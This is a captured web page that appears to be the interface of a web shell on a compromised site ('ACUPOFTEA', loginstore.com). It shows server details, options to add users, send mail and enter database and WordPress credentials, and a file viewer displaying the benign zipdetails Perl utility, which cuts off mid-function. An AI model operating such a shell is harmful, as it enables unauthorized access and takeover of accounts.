System
:
Linux loginstore 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
Software
:
Apache/2.4.52 (Ubuntu)
Server
:
190.119.170.206
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
bin
/
10.10.0.71
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for www.loginstore.com made by tabagkayu.
Folder Name
File Name
File Content
File
zipdetails
#!/usr/bin/perl eval 'exec /usr/bin/perl -S $0 ${1+"$@"}' if 0; # ^ Run only under a shell #!/usr/bin/perl # zipdetails # # Display info on the contents of a Zip file # BEGIN { pop @INC if $INC[-1] eq '.' } use strict; use warnings ; use IO::File; use Encode; use Getopt::Long; # Compression types use constant ZIP_CM_STORE => 0 ; use constant ZIP_CM_IMPLODE => 6 ; use constant ZIP_CM_DEFLATE => 8 ; use constant ZIP_CM_BZIP2 => 12 ; use constant ZIP_CM_LZMA => 14 ; use constant ZIP_CM_PPMD => 98 ; # General Purpose Flag use constant ZIP_GP_FLAG_ENCRYPTED_MASK => (1 << 0) ; use constant ZIP_GP_FLAG_STREAMING_MASK => (1 << 3) ; use constant ZIP_GP_FLAG_PATCHED_MASK => (1 << 5) ; use constant ZIP_GP_FLAG_STRONG_ENCRYPTED_MASK => (1 << 6) ; use constant ZIP_GP_FLAG_LZMA_EOS_PRESENT => (1 << 1) ; use constant ZIP_GP_FLAG_LANGUAGE_ENCODING => (1 << 11) ; # Internal File Attributes use constant ZIP_IFA_TEXT_MASK => 1; # Signatures for each of the headers use constant ZIP_LOCAL_HDR_SIG => 0x04034b50; use constant ZIP_DATA_HDR_SIG => 0x08074b50; use constant ZIP_CENTRAL_HDR_SIG => 0x02014b50; use constant ZIP_END_CENTRAL_HDR_SIG => 0x06054b50; use constant ZIP64_END_CENTRAL_REC_HDR_SIG => 0x06064b50; use constant ZIP64_END_CENTRAL_LOC_HDR_SIG => 0x07064b50; use constant ZIP_ARCHIVE_EXTRA_DATA_SIG => 0x08064b50; use constant ZIP_DIGITAL_SIGNATURE_SIG => 0x05054b50; use constant ZIP_ARCHIVE_EXTRA_DATA_RECORD_SIG => 0x08064b50; # Extra sizes use constant ZIP_EXTRA_HEADER_SIZE => 2 ; use constant ZIP_EXTRA_MAX_SIZE => 0xFFFF ; use constant ZIP_EXTRA_SUBFIELD_ID_SIZE => 2 ; use constant ZIP_EXTRA_SUBFIELD_LEN_SIZE => 2 ; use constant ZIP_EXTRA_SUBFIELD_HEADER_SIZE => ZIP_EXTRA_SUBFIELD_ID_SIZE + ZIP_EXTRA_SUBFIELD_LEN_SIZE; use constant ZIP_EXTRA_SUBFIELD_MAX_SIZE => ZIP_EXTRA_MAX_SIZE - ZIP_EXTRA_SUBFIELD_HEADER_SIZE; my %ZIP_CompressionMethods = ( 0 => 'Stored', 1 => 'Shrunk', 2 => 'Reduced compression factor 1', 3 => 'Reduced compression factor 2', 4 => 'Reduced compression factor 3', 5 => 'Reduced compression factor 4', 6 => 'Imploded', 7 => 'Reserved for Tokenizing compression algorithm', 8 => 'Deflated', 9 => 'Enhanced Deflating using Deflate64(tm)', 10 => 'PKWARE Data Compression Library Imploding', 11 => 'Reserved by PKWARE', 12 => 'BZIP2 ', 13 => 'Reserved by PKWARE', 14 => 'LZMA', 15 => 'Reserved by PKWARE', 16 => 'IBM z/OS CMPSC Compression', 17 => 'Reserved by PKWARE', 18 => 'File is compressed using IBM TERSE (new)', 19 => 'IBM LZ77 z Architecture (PFS)', 93 => 'Zstandard', 94 => 'MP3', 95 => 'XZ', 96 => 'WinZip JPEG Compression', 97 => 'WavPack compressed data', 98 => 'PPMd version I, Rev 1', 99 => 'AES Encryption', ); my %OS_Lookup = ( 0 => "MS-DOS", 1 => "Amiga", 2 => "OpenVMS", 3 => "Unix", 4 => "VM/CMS", 5 => "Atari ST", 6 => "HPFS (OS/2, NT 3.x)", 7 => "Macintosh", 8 => "Z-System", 9 => "CP/M", 10 => "Windoxs NTFS or TOPS-20", 11 => "MVS or NTFS", 12 => "VSE or SMS/QDOS", 13 => "Acorn RISC OS", 14 => "VFAT", 15 => "alternate MVS", 16 => "BeOS", 17 => "Tandem", 18 => "OS/400", 19 => "OS/X (Darwin)", 30 => "AtheOS/Syllable", ); my %Lookup = ( ZIP_LOCAL_HDR_SIG, \&LocalHeader, ZIP_DATA_HDR_SIG, \&DataHeader, ZIP_CENTRAL_HDR_SIG, \&CentralHeader, ZIP_END_CENTRAL_HDR_SIG, \&EndCentralHeader, ZIP64_END_CENTRAL_REC_HDR_SIG, \&Zip64EndCentralHeader, ZIP64_END_CENTRAL_LOC_HDR_SIG, \&Zip64EndCentralLocator, # TODO - Archive Encryption Headers & digital signature #ZIP_ARCHIVE_EXTRA_DATA_RECORD_SIG #ZIP_DIGITAL_SIGNATURE_SIG #ZIP_ARCHIVE_EXTRA_DATA_SIG ); my %Extras = ( 0x0001, ['ZIP64', \&decode_Zip64], 0x0007, ['AV Info', undef], 0x0008, ['Extended Language Encoding', undef], 0x0009, ['OS/2 extended attributes', undef], 0x000a, ['NTFS FileTimes', \&decode_NTFS_Filetimes], 0x000c, ['OpenVMS', undef], 0x000d, ['Unix', undef], 0x000e, ['Stream & Fork Descriptors', undef], 0x000f, ['Patch Descriptor', undef], 0x0014, ['PKCS#7 Store for X.509 Certificates', undef], 0x0015, ['X.509 Certificate ID and Signature for individual file', undef], 0x0016, ['X.509 Certificate ID for Central Directory', undef], 0x0017, ['Strong Encryption Header', undef], 0x0018, ['Record Management Controls', undef], 0x0019, ['PKCS#7 Encryption Recipient Certificate List', undef], 0x0020, ['Reserved for Timestamp record', undef], 0x0021, ['Policy Decryption Key Record', undef], 0x0022, ['Smartcrypt Key Provider Record', undef], 0x0023, ['Smartcrypt Policy Key Data Record', undef], # The Header ID mappings defined by Info-ZIP and third parties are: 0x0065, ['IBM S/390 attributes - uncompressed', \&decodeMVS], 0x0066, ['IBM S/390 attributes - compressed', undef], 0x07c8, ['Info-ZIP Macintosh (old, J. Lee)', undef], 0x2605, ['ZipIt Macintosh (first version)', undef], 0x2705, ['ZipIt Macintosh v 1.3.5 and newer (w/o full filename)', undef], 0x2805, ['ZipIt Macintosh v 1.3.5 and newer ', undef], 0x334d, ["Info-ZIP Macintosh (new, D. Haase's 'Mac3' field)", undef], 0x4154, ['Tandem NSK', undef], 0x4341, ['Acorn/SparkFS (David Pilling)', undef], 0x4453, ['Windows NT security descriptor', \&decode_NT_security], 0x4690, ['POSZIP 4690', undef], 0x4704, ['VM/CMS', undef], 0x470f, ['MVS', undef], 0x4854, ['Theos, old inofficial port', undef], 0x4b46, ['FWKCS MD5 (see below)', undef], 0x4c41, ['OS/2 access control list (text ACL)', undef], 0x4d49, ['Info-ZIP OpenVMS (obsolete)', undef], 0x4d63, ['Macintosh SmartZIP, by Macro Bambini', undef], 0x4f4c, ['Xceed original location extra field', undef], 0x5356, ['AOS/VS (binary ACL)', undef], 0x5455, ['Extended Timestamp', \&decode_UT], 0x554e, ['Xceed unicode extra field', \&decode_Xceed_unicode], 0x5855, ['Info-ZIP Unix (original; also OS/2, NT, etc.)', \&decode_UX], 0x5a4c, ['ZipArchive Unicode Filename', undef], 0x5a4d, ['ZipArchive Offsets Array', undef], 0x6375, ['Info-ZIP Unicode Comment', \&decode_up ], 0x6542, ['BeOS (BeBox, PowerMac, etc.)', undef], 0x6854, ['Theos', undef], 0x7075, ['Info-ZIP Unicode Path', \&decode_up ], 0x756e, ['ASi Unix', undef], 0x7441, ['AtheOS (AtheOS/Syllable attributes)', undef], 0x7855, ['Unix Extra type 2', \&decode_Ux], 0x7875, ['Unix Extra Type 3', \&decode_ux], 0x9901, ['AES Encryption', \&decode_AES], 0xa11e, ['Data Stream Alignment', undef], 0xA220, ['Open Packaging Growth Hint', \&decode_GrowthHint ], 0xCAFE, ['Java Executable', \&decode_Java_exe], 0xfb4a, ['SMS/QDOS', undef], ); my $VERSION = "2.02" ; my $FH; my $ZIP64 = 0 ; my $NIBBLES = 8; my $LocalHeaderCount = 0; my $CentralHeaderCount = 0; my $START; my $OFFSET = U64->new( 0 ); my $TRAILING = 0 ; my $PAYLOADLIMIT = 256; # U64->new( 256 ); my $ZERO = U64->new( 0 ); my $SEEN = Seen->new(); sub prOff { my $offset = shift; my $s = offset($OFFSET); $OFFSET->add($offset); return $s; } sub offset { my $v = shift ; if (ref $v eq 'U64') { my $hi = $v->getHigh(); my $lo = $v->getLow(); if ($hi) { my $hiNib = $NIBBLES - 8 ; sprintf("%0${hiNib}X", $hi) . sprintf("%08X", $lo); } else { sprintf("%0${NIBBLES}X", $lo); } } else { sprintf("%0${NIBBLES}X", $v); } } my ($OFF, $LENGTH, $CONTENT, $TEXT, $VALUE) ; my $FMT1 ; my $FMT2 ; sub setupFormat { my $wantVerbose = shift ; my $nibbles = shift; my $width = '@' . ('>' x ($nibbles -1)); my $space = " " x length($width); my $fmt ; if ($wantVerbose) { $FMT1 = " format STDOUT = $width $width ^<<<<<<<<<<<^<<<<<<<<<<<<<<<<<<<< ^<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< \$OFF, \$LENGTH, \$CONTENT, \$TEXT, \$VALUE $space $space ^<<<<<<<<<<<^<<<<<<<<<<<<<<<<<<<< ^<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<~~ \$CONTENT, \$TEXT, \$VALUE . "; $FMT2 = " format STDOUT = $width $width ^<<<<<<<<<<< ^<<<<<<<<<<<<<<<<<< ^<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< \$OFF, \$LENGTH, \$CONTENT, \$TEXT, \$VALUE $space $space ^<<<<<<<<<<< ^<<<<<<<<<<<<<<<<<< ^<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<~~ \$CONTENT, \$TEXT, \$VALUE . " ; } else { $FMT1 = " format STDOUT = $width ^<<<<<<<<<<<<<<<<<<<< ^<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< \$OFF, \$TEXT, \$VALUE $space ^<<<<<<<<<<<<<<<<<<<< ^<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<~~ \$TEXT, \$VALUE . "; $FMT2 = " format STDOUT = $width ^<<<<<<<<<<<<<<<<<< ^<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< \$OFF, \$TEXT, \$VALUE $space ^<<<<<<<<<<<<<<<<<< ^<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<~~ \$TEXT, \$VALUE . " ; } eval "$FMT1"; $| = 1; } sub mySpr { my $format = shift ; return "" if ! defined $format; return $format unless @_ ; return sprintf $format, @_ ; } sub out0 { my $size = shift; my $text = shift; my $format = shift; $OFF = prOff($size); $LENGTH = offset($size) ; $CONTENT = '...'; $TEXT = $text; $VALUE = mySpr $format, @_; write; skip($FH, $size); } sub xDump { my $input = shift; $input =~ tr/\0-\37\177-\377/./; return $input; } sub hexDump { my $input = shift; my $out = unpack('H*', $input) ; $out =~ s#(..)# $1#g ; $out =~ s/^ //; $out = uc $out; return $out; } sub out { my $data = shift; my $text = shift; my $format = shift; my $size = length($data) ; $OFF = prOff($size); $LENGTH = offset($size) ; $CONTENT = hexDump($data); $TEXT = $text; $VALUE = mySpr $format, @_; no warnings; write; } sub out1 { my $text = shift; my $format = shift; $OFF = ''; $LENGTH = '' ; $CONTENT = ''; $TEXT = $text; $VALUE = mySpr $format, @_; write; } sub out2 { my $data = shift ; my $text = shift ; my $format = shift; my $size = length($data) ; $OFF = prOff($size); $LENGTH = offset($size); $CONTENT = hexDump($data); $TEXT = $text; $VALUE = mySpr $format, @_; no warnings; eval "$FMT2"; write ; eval "$FMT1"; } sub Value { my $letter = shift; my @value = @_; if ($letter eq 'C') { return Value_C(@value) } elsif ($letter eq 'v') { return Value_v(@value) } elsif ($letter eq 'V') { return Value_V(@value) } elsif ($letter eq 'VV') { return Value_VV(@value) } } sub outer { my $name = shift ; my $unpack = shift ; my $size = shift ; my $cb1 = shift ; my $cb2 = shift ; myRead(my $buff, $size); my (@value) = unpack $unpack, $buff; my $hex = Value($unpack, @value); if (defined $cb1) { my $v ; if (ref $cb1 eq 'CODE') { $v = $cb1->(@value) ; } else { $v = $cb1 ; } $v = "'" . $v unless $v =~ /^'/; $v .= "'" unless $v =~ /'$/; $hex .= " $v" ; } out $buff, $name, $hex ; $cb2->(@value) if defined $cb2 ; return $value[0]; } sub out_C { my $name = shift ; my $cb1 = shift ; my $cb2 = shift ; outer($name, 'C', 1, $cb1, $cb2); } sub out_v { my $name = shift ; my $cb1 = shift ; my $cb2 = shift ; outer($name, 'v', 2, $cb1, $cb2); } sub out_V { my $name = shift ; my $cb1 = shift ; my $cb2 = shift ; outer($name, 'V', 4, $cb1, $cb2); } sub out_VV { my $name = shift ; my $cb1 = shift ; my $cb2 = shift ; outer($name, 'VV', 8, $cb1, $cb2); } # sub outSomeData # { # my $size = shift; # my $message = shift; # my $size64 = U64::mkU64($size); # if ($size64->gt($ZERO)) { # my $size32 = $size64->getLow(); # if ($size64->gt($PAYLOADLIMIT) ) { # out0 $size32, $message; # } else { # myRead(my $buffer, $size32 ); # out $buffer, $message, xDump $buffer ; # } # } # } sub outSomeData { my $size = shift; my $message = shift; if ($size > 0) { if ($size > $PAYLOADLIMIT) { my $before = $FH->tell(); out0 $size, $message; # printf "outSomeData %X %X $size %X\n", $before, $FH->tell(), $size; } else { myRead(my $buffer, $size ); out $buffer, $message, xDump $buffer ; } } } sub unpackValue_C { Value_v(unpack "C", $_[0]); } sub Value_C { sprintf "%02X", $_[0]; } sub unpackValue_v { Value_v(unpack "v", $_[0]); } sub Value_v { sprintf "%04X", $_[0]; } sub unpackValue_V { Value_V(unpack "V", $_[0]); } sub Value_V { my $v = defined $_[0] ? $_[0] : 0; sprintf "%08X", $v; } sub unpackValue_VV { my ($lo, $hi) = unpack ("V V", $_[0]); Value_VV($lo, $hi); } sub Value_U64 { my $u64 = shift ; Value_VV($u64->getLow(), $u64->getHigh()); } sub Value_VV { my $lo = defined $_[0] ? $_[0] : 0; my $hi = defined $_[1] ? $_[1] : 0; if ($hi == 0) { sprintf "%016X", $lo; } else { sprintf("%08X", $hi) . sprintf "%08X", $lo; } } sub Value_VV64 { my $buffer = shift; # This needs perl 5.10 # return unpack "Q<", $buffer; my ($lo, $hi) = unpack ("V V" , $buffer); no warnings 'uninitialized'; return $hi * (0xFFFFFFFF+1) + $lo; } sub read_U64 { my $b ; myRead($b, 8); my ($lo, $hi) = unpack ("V V" , $b); no warnings 'uninitialized'; return ($b, U64->new( $hi, $lo) ); } sub read_VV { my $b ; myRead($b, 8); my ($lo, $hi) = unpack ("V V" , $b); no warnings 'uninitialized'; return ($b, $hi * (0xFFFFFFFF+1) + $lo); } sub read_V { my $b ; myRead($b, 4); return ($b, unpack ("V", $b)); } sub read_v { my $b ; myRead($b, 2); return ($b, unpack "v", $b); } sub read_C { my $b ; myRead($b, 1); return ($b, unpack "C", $b); } sub seekTo { my $offset = shift ; my $loc = shift ; $loc = SEEK_SET if ! defined $loc ; $FH->seek($offset, $loc); $OFFSET = new U64($offset); } sub scanForSignature { my %sigs = map { $_ => 1 } map { substr $_, 2, 2 } # don't want the initial "PK" map { pack "V", $_ } ( ZIP_LOCAL_HDR_SIG , ZIP_DATA_HDR_SIG , ZIP_CENTRAL_HDR_SIG , ZIP_END_CENTRAL_HDR_SIG , ZIP64_END_CENTRAL_REC_HDR_SIG , ZIP64_END_CENTRAL_LOC_HDR_SIG , # ZIP_ARCHIVE_EXTRA_DATA_SIG , # ZIP_DIGITAL_SIGNATURE_SIG , # ZIP_ARCHIVE_EXTRA_DATA_RECORD_SIG , ); my $start = $FH->tell(); my $last = ''; my $buffer ; while ($FH->read($buffer, 1024 * 1000)) { my $combine = substr($last, -4) . $buffer ; $last = $buffer; my $ix = index($combine, "PK") ; next if $ix == -1; my $rest = substr($combine, $ix+2, 2); next unless length $rest == 2 && $sigs{$rest} ; my $v = unpack("v", $rest) ; # possible match my $here = $FH->tell(); seekTo($here - length($combine) + $ix); return 1; } return 0; } my $is64In32 = 0; my $opt_verbose = 0; my $opt_scan = 0; $Getopt::Long::bundling = 1 ; GetOptions("h" => \&Usage, "v" => \$opt_verbose, "scan" => \$opt_scan, "version" => sub { print "$VERSION\n"; exit }, ) or Usage("Invalid command line option\n"); Usage("No zipfile") unless @ARGV == 1; my $filename = shift @ARGV; die "$filename does not exist\n" unless -e $filename ; die "$filename not a standard file\n" unless -f $filename ; $FH = IO::File->new( "<$filename" ) or die "Cannot open $filename: $!\n"; my $FILELEN = -s $filename ; $TRAILING = -s $filename ; $NIBBLES = U64::nibbles(-s $filename) ; #$NIBBLES = int ($NIBBLES / 4) + ( ($NIBBLES % 4) ? 1 : 0 ); #$NIBBLES = 4 * $NIBBLES; # Minimum of 4 nibbles $NIBBLES = 4 if $NIBBLES < 4 ; die "$filename too short to be a zip file\n" if $FILELEN < 22 ; setupFormat($opt_verbose, $NIBBLES); if(0) { # Sanity check that this is a Zip file my ($buffer, $signature) = read_V(); warn "$filename doesn't look like a zip file\n" if $signature != ZIP_LOCAL_HDR_SIG ; $FH->seek(0, SEEK_SET) ; } my @Messages = (); if ($opt_scan) { while(scanForSignature()) { my $here = $FH->tell(); my ($buffer, $signature) = read_V(); my $handler = $Lookup{$signature}; $handler->($signature, $buffer); seekTo($here + 4) ; } dislayMessages(); exit; } our ($CdExists, $CdOffset, @CentralDirectory) = scanCentralDirectory($FH); die "No Central Directory records found\n" if ! $CdExists ; $OFFSET->reset(); $FH->seek(0, SEEK_SET) ; outSomeData($START, "PREFIX DATA") if defined $START && $START > 0 ; my $skippedFrom = 0 ; my $skippedContent = 0 ; while (1) { last if $FH->eof(); my $here = $FH->tell(); if ($here >= $TRAILING) { print "\n" ; outSomeData($FILELEN - $TRAILING, "TRAILING DATA"); last; } my ($buffer, $signature) = read_V(); my $handler = $Lookup{$signature}; if (!defined $handler) { if (@CentralDirectory) { # Should be at offset that central directory says my $locOffset = $CentralDirectory[0][0]; my $delta = $locOffset - $here ; if ($here + 4 == $locOffset ) { for (0 .. 3) { $FH->ungetc(ord(substr($buffer, $_, 1))) } outSomeData($delta, "UNEXPECTED PADDING"); next; } } if ($here < $CdOffset) { # next # if scanForSignature() ; $skippedFrom = $FH->tell() ; $skippedContent = $CdOffset - $skippedFrom ; print "\nWARNING!\nZip local header not found.\n"; printf "Skipping 0x%x bytes to Central Directory...\n", $skippedContent; push @Messages, sprintf("Expected Zip header not found at offset 0x%X, ", $skippedFrom) . sprintf("skipped 0x%X bytes\n", $skippedContent); seekTo($CdOffset); next; } else { printf "\n\nUnexpected END at offset %08X, value %s\n", $here, Value_V($signature); last; } } $ZIP64 = 0 if $signature != ZIP_DATA_HDR_SIG ; $handler->($signature, $buffer); } dislayMessages(); exit ; sub dislayMessages { if (@Messages) { my $count = scalar @Messages ; print "\nWARNINGS\n\n"; print "* $_\n" for @Messages ; } print "Done\n"; } sub compressionMethod { my $id = shift ; Value_v($id) . " '" . ($ZIP_CompressionMethods{$id} || "Unknown Method") . "'" ; } sub LocalHeader { my $signature = shift ; my $data = shift ; my $from_offset = $FH->tell() - 4; print "\n"; ++ $LocalHeaderCount; out $data, "LOCAL HEADER #" . sprintf("%X", $LocalHeaderCount) , Value_V($signature); my $buffer; my ($loc, $CDcompressedLength) ; ($loc, $CDcompressedLength) = @{ shift @CentralDirectory } if ! $opt_scan ; out_C "Extract Zip Spec", \&decodeZipVer; out_C "Extract OS", \&decodeOS; my ($bgp, $gpFlag) = read_v(); my ($bcm, $compressedMethod) = read_v(); out $bgp, "General Purpose Flag", Value_v($gpFlag) ; GeneralPurposeBits($compressedMethod, $gpFlag); out $bcm, "Compression Method", compressionMethod($compressedMethod) ; out_V "Last Mod Time", sub { scalar getTime(_dosToUnixTime($_[0])) }; my $crc = out_V "CRC"; my $compressedLength = out_V "Compressed Length"; my $uncompressedLength = out_V "Uncompressed Length"; my $filenameLength = out_v "Filename Length"; my $extraLength = out_v "Extra Length"; my $filename ; myRead($filename, $filenameLength); outputFilename($filename); my $cl64 = U64->new( $compressedLength ); my %ExtraContext = (); if ($extraLength) { my @z64 = ($uncompressedLength, $compressedLength, 1, 1); $ExtraContext{Zip64} = \@z64 ; $ExtraContext{InCentralDir} = 0; walkExtra($extraLength, \%ExtraContext); } my $size = 0; $size = printAes(\%ExtraContext) if $compressedMethod == 99 ; $size += printLzmaProperties() if $compressedMethod == ZIP_CM_LZMA ; $CDcompressedLength = $compressedLength if $opt_scan ; # $CDcompressedLength->subtract($size) # if $size ; $CDcompressedLength -= $size; # if ($CDcompressedLength->getHigh() || $CDcompressedLength->getLow()) { if ($CDcompressedLength) { outSomeData($CDcompressedLength, "PAYLOAD") ; } if ($compressedMethod == 99) { my $auth ; myRead($auth, 10); out $auth, "AES Auth", hexDump($auth); } # $SEEN->save("LOCAL HEADER #" . sprintf("%X", $LocalHeaderCount), $filename, $from_offset, $from_offset + $CDcompressedLength) } sub outputFilename { my $filename = shift; if (length $filename > 256) { my $f = substr($filename, 0, 256) ; out $f, "Filename", "'". $f . "' ..."; } else { out $filename, "Filename", "'". $filename . "'"; } } sub CentralHeader { my $signature = shift ; my $data = shift ; my $from_offset = $FH->tell() - 4; ++ $CentralHeaderCount; print "\n"; out $data, "CENTRAL HEADER #" . sprintf("%X", $CentralHeaderCount) . "", Value_V($signature); my $buffer; out_C "Created Zip Spec", \&decodeZipVer; out_C "Created OS", \&decodeOS; out_C "Extract Zip Spec", \&decodeZipVer; out_C "Extract OS", \&decodeOS; my ($bgp, $gpFlag) = read_v(); my ($bcm, $compressedMethod) = read_v(); out $bgp, "General Purpose Flag", Value_v($gpFlag) ; GeneralPurposeBits($compressedMethod, $gpFlag); out $bcm, "Compression Method", compressionMethod($compressedMethod) ; out_V "Last Mod Time", sub { scalar getTime(_dosToUnixTime($_[0])) }; my $crc = out_V "CRC"; my $compressedLength = out_V "Compressed Length"; my $uncompressedLength = out_V "Uncompressed Length"; my $filenameLength = out_v "Filename Length"; my $extraLength = out_v "Extra Length"; my $comment_length = out_v "Comment Length"; my $disk_start = out_v "Disk Start"; my $int_file_attrib = out_v "Int File Attributes"; out1 "[Bit 0]", $int_file_attrib & 1 ? "1 Text Data" : "0 'Binary Data'"; my $ext_file_attrib = out_V "Ext File Attributes"; out1 "[Bit 0]", "Read-Only" if $ext_file_attrib & 0x01 ; out1 "[Bit 1]", "Hidden" if $ext_file_attrib & 0x02 ; out1 "[Bit 2]", "System" if $ext_file_attrib & 0x04 ; out1 "[Bit 3]", "Label" if $ext_file_attrib & 0x08 ; out1 "[Bit 4]", "Directory" if $ext_file_attrib & 0x10 ; out1 "[Bit 5]", "Archive" if $ext_file_attrib & 0x20 ; my $lcl_hdr_offset = out_V "Local Header Offset"; my $filename ; myRead($filename, $filenameLength); outputFilename($filename); my %ExtraContext = (); if ($extraLength) { my @z64 = ($uncompressedLength, $compressedLength, $lcl_hdr_offset, $disk_start); $ExtraContext{Zip64} = \@z64 ; $ExtraContext{InCentralDir} = 1; walkExtra($extraLength, \%ExtraContext); } if ($comment_length) { my $comment ; myRead($comment, $comment_length); out $comment, "Comment", "'". $comment . "'"; } $SEEN->save("CENTRAL HEADER ref Local #" . sprintf("%X", $CentralHeaderCount), $filename, $lcl_hdr_offset, $lcl_hdr_offset + $compressedLength) ; # $SEEN->save("CENTRAL HEADER #" . sprintf("%X", $CentralHeaderCount), $filename, $from_offset, $FH-tell()); } sub decodeZipVer { my $ver = shift ; my $sHi = int($ver /10) ; my $sLo = $ver % 10 ; #out1 "Zip Spec", "$sHi.$sLo"; "$sHi.$sLo"; } sub decodeOS { my $ver = shift ; $OS_Lookup{$ver} || "Unknown" ; } sub Zip64EndCentralHeader { my $signature = shift ; my $data = shift ; print "\n"; out $data, "ZIP64 END CENTRAL DIR RECORD", Value_V($signature); my $buff; myRead($buff, 8); out $buff, "Size of record", unpackValue_VV($buff); my $size = Value_VV64($buff); out_C "Created Zip Spec", \&decodeZipVer; out_C "Created OS", \&decodeOS; out_C "Extract Zip Spec", \&decodeZipVer; out_C "Extract OS", \&decodeOS; out_V "Number of this disk"; out_V "Central Dir Disk no"; out_VV "Entries in this disk"; out_VV "Total Entries"; out_VV "Size of Central Dir"; out_VV "Offset to Central dir"; # TODO - if ($size != 44) { push @Messages, "Unsupported Size field in Zip64EndCentralHeader: should be 44, got $size\n" } } sub Zip64EndCentralLocator { my $signature = shift ; my $data = shift ; print "\n"; out $data, "ZIP64 END CENTRAL DIR LOCATOR", Value_V($signature); out_V "Central Dir Disk no"; out_VV "Offset to Central dir"; out_V "Total no of Disks"; } sub EndCentralHeader { my $signature = shift ; my $data = shift ; print "\n"; out $data, "END CENTRAL HEADER", Value_V($signature); out_v "Number of this disk"; out_v "Central Dir Disk no"; out_v "Entries in this disk"; out_v "Total Entries"; out_V "Size of Central Dir"; out_V "Offset to Central Dir"; my $comment_length = out_v "Comment Length"; if ($comment_length) { my $comment ; myRead($comment, $comment_length); out $comment, "Comment", "'$comment'"; } } sub DataHeader { my $signature = shift ; my $data = shift ; print "\n"; out $data, "STREAMING DATA HEADER", Value_V($signature); out_V "CRC"; if ($ZIP64) { out_VV "Compressed Length" ; out_VV "Uncompressed Length" ; } else { out_V "Compressed Length" ; out_V "Uncompressed Length" ; } } sub GeneralPurposeBits { my $method = shift; my $gp = shift; out1 "[Bit 0]", "1 'Encryption'" if $gp & ZIP_GP_FLAG_ENCRYPTED_MASK; my %lookup = ( 0 => "Normal Compression", 1 => "Maximum Compression", 2 => "Fast Compression", 3 => "Super Fast Compression"); if ($method == ZIP_CM_DEFLATE) { my $mid = ($gp >> 1) & 0x03 ; out1 "[Bits 1-2]", "$mid '$lookup{$mid}'"; } if ($method == ZIP_CM_LZMA) { if ($gp & ZIP_GP_FLAG_LZMA_EOS_PRESENT) { out1 "[Bit 1]", "1 'LZMA EOS Marker Present'" ; } else { out1 "[Bit 1]", "0 'LZMA EOS Marker Not Present'" ; } } if ($method == ZIP_CM_IMPLODE) # Imploding { out1 "[Bit 1]", ($gp & (1 << 1) ? "1 '8k" : "0 '4k") . " Sliding Dictionary'" ; out1 "[Bit 2]", ($gp & (2 << 1) ? "1 '3" : "0 '2" ) . " Shannon-Fano Trees'" ; } out1 "[Bit 3]", "1 'Streamed'" if $gp & ZIP_GP_FLAG_STREAMING_MASK; out1 "[Bit 4]", "1 'Enhanced Deflating'" if $gp & 1 << 4; out1 "[Bit 5]", "1 'Compressed Patched'" if $gp & 1 << 5 ; out1 "[Bit 6]", "1 'Strong Encryption'" if $gp & ZIP_GP_FLAG_STRONG_ENCRYPTED_MASK; out1 "[Bit 11]", "1 'Language Encoding'" if $gp & ZIP_GP_FLAG_LANGUAGE_ENCODING; out1 "[Bit 12]", "1 'Pkware Enhanced Compression'" if $gp & 1 <<12 ; out1 "[Bit 13]", "1 'Encrypted Central Dir'" if $gp & 1 <<13 ; return (); } sub seekSet { my $fh = $_[0] ; my $size = $_[1]; use Fcntl qw(SEEK_SET); if (ref $size eq 'U64') { seek($fh, $size->get64bit(), SEEK_SET); } else { seek($fh, $size, SEEK_SET); } } sub skip { my $fh = $_[0] ; my $size = $_[1]; use Fcntl qw(SEEK_CUR); if (ref $size eq 'U64') { seek($fh, $size->get64bit(), SEEK_CUR); } else { seek($fh, $size, SEEK_CUR); } } sub myRead { my $got = \$_[0] ; my $size = $_[1]; my $wantSize = $size; $$got = ''; if ($size == 0) { return ; } if ($size > 0) { my $buff ; my $status = $FH->read($buff, $size); return $status if $status < 0; $$got .= $buff ; } my $len = length $$got; die "Truncated file (got $len, wanted $wantSize): $!\n" if length $$got != $wantSize; } sub walkExtra { my $XLEN = shift; my $context = shift; my $buff ; my $offset = 0 ; my $id; my $subLen; my $payload ; my $count = 0 ; while ($offset < $XLEN) { ++ $count; # Detect if there is not enough data for an extra ID and length. # Android zipalign and zipflinger are prime candidates for these # non-standard extra sub-fields. my $remaining = $XLEN - $offset; if ($remaining < ZIP_EXTRA_SUBFIELD_HEADER_SIZE) { # There is not enough. Consume whatever is there and return so parsing # can continue. myRead($payload, $remaining); my $data = hexDump($payload); out $payload, "Malformed Extra Data", $data; return undef; } myRead($id, ZIP_EXTRA_SUBFIELD_ID_SIZE); $offset += ZIP_EXTRA_SUBFIELD_ID_SIZE; my $lookID = unpack "v", $id ; my ($who, $decoder) = @{ defined $Extras{$lookID} ? $Extras{$lookID} : ['', undef] }; #my ($who, $decoder) = @{ $Extras{unpack "v", $id} || ['', undef] }; $who = "$id: $who" if $id =~ /\w\w/ ; $who = "'$who'"; out $id, "Extra ID #" . Value_v($count), unpackValue_v($id) . " $who" ; myRead($buff, ZIP_EXTRA_SUBFIELD_LEN_SIZE); $offset += ZIP_EXTRA_SUBFIELD_LEN_SIZE; $subLen = unpack("v", $buff); out2 $buff, "Length", Value_v($subLen) ; return undef if $offset + $subLen > $XLEN ; if (! defined $decoder) { if ($subLen) { myRead($payload, $subLen); my $data = hexDump($payload); out2 $payload, "Extra Payload", $data; } } else { $decoder->($subLen, $context) ; } $offset += $subLen ; } return undef ; } sub full32 { return $_[0] == 0xFFFFFFFF ; } sub decode_Zip64 { my $len = shift; my $context = shift; my $z64Data = $context->{Zip64}; $ZIP64 = 1; if (full32 $z64Data->[0] ) { out_VV " Uncompressed Size"; } if (full32 $z64Data->[1] ) { out_VV " Compressed Size"; } if (full32 $z64Data->[2] ) { out_VV " Offset to Local Dir"; } if ($z64Data->[3] == 0xFFFF ) { out_V " Disk Number"; } } sub 